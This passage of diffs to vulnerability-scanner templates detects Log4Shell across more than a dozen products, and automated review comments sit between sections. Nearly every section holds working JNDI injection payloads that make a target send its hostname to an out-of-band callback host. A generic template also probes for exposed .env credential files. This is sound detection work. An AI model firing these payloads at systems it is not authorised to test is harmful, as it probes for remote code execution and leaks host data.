shodan-query: http.html:"Apache OFBiz"
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /webtools/control/main HTTP/1.1
Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27
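Review bot: The new `group: 2` ("injection point") and `group: 1` ("hostName") extractors on `\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+` rely on group 1 being the only dot-containing segment and on exactly three labels following the injection-point label, which appears to hold for the public `id.oast.tld` domains but not for a self-hosted interactsh server on a deeper domain, where the greedy group 1 would swallow the `cookie` label and both printed values shift. Since each template pins its own label, anchoring it makes the split unambiguous, e.g. `- '\d{6}\.([a-zA-Z0-9\.\-]+)\.(cookie)\.'`. The `\d{6}` prefix does line up with two `rand_int(111, 999)` values. The same extractor pair is repeated in every other log4j section on this page (Solr through Rundeck) with its own label, and this comment applies to each of them.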


@ -24,11 +24,15 @@ info:
shodan-query: http.html:"Apache Solr"
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 25s
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
@ -52,10 +56,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
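Review bot: The rewritten request line `GET /solr/admin/{{endpoint}}?action=...` has one `}` too many after `{{rand2}}` (`{{rand2}}}%7D`), so after template expansion the stray literal brace closes the `${jndi:` lookup before `.${hostName}.uri.{{interactsh-url}}` is reached, leaving a callback host of just the six digits that would neither resolve under the interactsh domain nor satisfy the new `\d{6}\.` matcher. The Elasticsearch section on this page shows the intended encoding (`$%7B%3A-{{rand2}}%7D.`); the fix is `%24%7B%3A-{{rand2}}%7D.%24%7BhostName%7D` in place of `%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D`. The `attack: clusterbomb` line indicates the request block continues outside the visible hunk.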


@ -23,6 +23,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -41,21 +45,31 @@ http:
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- type: word
part: body
words:
- "<title>Jamf Pro Login</title>"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27


@ -22,13 +22,17 @@ info:
shodan-query: title:"CloudCenter Suite"
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 10s
POST /suite-auth/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
Content-Type: application/json
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@ -43,7 +47,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -55,10 +59,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/22


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/ccmadmin/showHome.do
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04


@ -20,6 +20,10 @@ info:
verified: "true"
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -54,10 +58,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by CS 03/27/2023


@ -24,10 +24,14 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27


@ -0,0 +1,45 @@
id: generic-env
info:
name: Generic Env File Disclosure
severity: high
author: kazet
description: |
A .env file was discovered containing sensitive information like database credentials and tokens. It should not be publicly accessible.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
tags: config,exposure,env
http:
- method: GET
path:
- "{{BaseURL}}/.env"
- "{{BaseURL}}/.env.bak"
- "{{BaseURL}}/.env.dev"
- "{{BaseURL}}/.env.dev.local"
- "{{BaseURL}}/.env.development.local"
- "{{BaseURL}}/.env.prod"
- "{{BaseURL}}/.env.prod.local"
- "{{BaseURL}}/.env.production"
- "{{BaseURL}}/.env.production.local"
- "{{BaseURL}}/.env.local"
- "{{BaseURL}}/.env.example"
- "{{BaseURL}}/.env.stage"
- "{{BaseURL}}/.env.live"
- "{{BaseURL}}/.env.backup"
- "{{BaseURL}}/.env.save"
- "{{BaseURL}}/.env.old"
- "{{BaseURL}}/.env.www"
- "{{BaseURL}}/.env_1"
- "{{BaseURL}}/.env_sample"
- "{{BaseURL}}/.env.{{DN}}"
- "{{BaseURL}}/.env.{{SD}}"
- "{{BaseURL}}/api/.env"
matchers:
- type: regex
part: body
regex:
- "(?mi)^[a-z_]*(KEY|TOKEN|PASS|SECRET|DB_URL|DATABASE_URL|MAILER_URL)[a-z_]*="
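Review bot: The single body regex under `matchers:` is the only condition, so any catch-all or soft-404 page whose body has a line beginning with something like `apiKey=` or `turkey=` (the `(?i)` flag and the `[a-z_]*` wrapper admit both) is reported as a high-severity credential exposure, and all 22 paths are requested on every host because there is no `stop-at-first-match: true`. `.env.example` and `.env_sample` are commonly committed on purpose with placeholder values, so flagging them at `severity: high` needs either a separate lower-severity template or a comment justifying it. A status matcher and a negative HTML check tighten the template without weakening the positive signal.
```yaml
    # … unchanged: method and path list …
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "(?mi)^[a-z_]*(KEY|TOKEN|PASS|SECRET|DB_URL|DATABASE_URL|MAILER_URL)[a-z_]*="
      - type: word
        part: body
        negative: true
        words:
          - "<html"
          - "<body"
      - type: status
        status:
          - 200
```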


@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -48,13 +52,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23


@ -23,6 +23,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and
matchers:
@ -47,13 +51,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23


@ -21,10 +21,14 @@ info:
verified: "true"
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
Host: {{Hostname}}
{
@ -44,17 +48,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -33,7 +37,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
cookie-reuse: true
matchers-condition: and
@ -46,7 +50,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: regex
@ -61,10 +65,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs 2022/10/10


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
matchers-condition: and
matchers:
@ -44,7 +48,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -56,10 +60,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23


@ -20,10 +20,14 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -22,6 +22,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Referer: {{RootURL}}/opennms/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs on 2022/10/23
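Review bot: The six-digit marker built from rand1/rand2 is never compared with the values actually sent: the matcher and both extractors accept any `\d{6}` prefix, so a callback belonging to a different run against the same interactsh session can still satisfy the matcher. If the engine expands template variables inside regex patterns, `'{{rand1}}{{rand2}}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'` would pin the match to this request; otherwise a separate `word` matcher on `{{rand1}}{{rand2}}` with `part: interactsh_request` would give the same guarantee. The `group: 2` extractor also appears to yield the injection point (`postdata`) only when `{{interactsh-url}}` has exactly three labels, since group 1 is greedy and the pattern demands four labels after it; a comment such as `# group 2 is the injection point only for a 3-label interactsh-url` on that line would save the next maintainer a surprise. The same applies to the Metabase section above and the Rundeck, UniFi, VMware Site Recovery, XenMobile and X-Api-Version sections below.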


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Connection: close
Referer: {{BaseURL}}/user/login
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
